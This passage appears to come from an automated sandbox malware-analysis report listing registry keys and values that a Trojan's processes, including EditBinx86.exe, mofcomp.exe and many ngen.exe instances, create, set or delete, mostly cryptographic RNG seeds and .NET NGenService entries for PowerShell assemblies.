[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\NetworkAnalyser[APP_SETTINGS]]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\InstallationStatsUploder_12052016001648\DEBUG]
"Trace Level"

The process EditBinx86.exe:960 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA E5 8E F0 E7 CA EA 3F CE 75 75 51 8C 22 70 5A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process EditBinx86.exe:2012 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 E5 84 5C A6 43 C4 15 B2 24 7E 83 52 2E 9C 3B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process mofcomp.exe:2684 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 9D 1A 22 B3 D5 F3 83 3A C0 4E DF 55 77 DC 48"

The process ngen.exe:332 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 52 8F 0E 0F FA 54 00 3C E6 E9 85 AF CF D1 41"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:276 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 42 5E 7B 1C 3C ED 78 F2 D8 6D 10 D1 D6 E7 A8"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

The process ngen.exe:2092 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC BC 87 5E C4 4B 42 DA 03 E4 1B 73 41 F3 35 30"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

The process ngen.exe:3300 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 A9 17 10 EE 21 29 53 AE EB 9E FC 90 17 0B 63"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

The process ngen.exe:2136 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 09 10 67 51 15 9D 57 7A E3 D9 52 55 2E AA DB"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3212 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 23 51 0A C4 D3 1B 8E D4 36 75 54 CC B8 14 3C"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"

The process ngen.exe:2056 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D C7 50 60 27 4B FE 93 B0 6B 67 B2 C8 0C 81 3C"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:3340 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 66 A5 80 52 1D 5B 49 5E AA CC B0 11 26 CC B2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:2248 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 1F 51 28 15 7E 25 A2 89 F6 BD 7D 1A 9F B1 FF"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3160 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 78 37 B4 FA 2C 40 32 08 6C 84 2A 83 4B AC 76"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:2112 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 2C 28 A0 93 3F 82 43 91 58 77 A9 CE A5 93 A0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"

The process ngen.exe:2240 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 9B 37 65 8B E3 AF 8E B6 40 00 D9 72 1D 5E C1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

The process ngen.exe:3232 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D E4 30 C1 23 15 FA 7F 14 8A 61 97 FF 5F DC 4F"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:444 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 6E 41 68 A3 E8 49 37 B2 5D DE DD E2 CB C2 65"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:1496 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 74 96 77 0C 45 17 E3 2A 02 94 A4 CA 17 AE 2F"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

The process ngen.exe:2188 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 75 9E 1D C8 09 E6 CF 31 04 66 46 2F 29 63 10"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:2212 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 36 76 ED 77 8E 25 B8 EE 75 82 97 3D 45 CF 7C"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

The process ngen.exe:2276 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 A5 77 22 60 9E B8 46 4A 13 34 46 7E C4 A3 37"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

The process ngen.exe:780 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E E9 28 A8 56 46 5F 94 4C 7D 77 53 42 7F 27 AC"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

The process ngen.exe:3224 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 D1 27 E7 BC 72 B6 0F A7 59 87 F5 AE A3 83 4D"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:2024 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D C9 31 3B 33 6B 23 CB 5E 5B BD 70 DF 4A B3 3B"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

The process ngen.exe:2160 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 C3 3B 65 C7 8A 27 F9 36 85 C5 5C 10 52 26 22"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:2148 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 1D 07 5F D9 AC 10 EB 38 48 A6 47 4E 8D 28 81"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

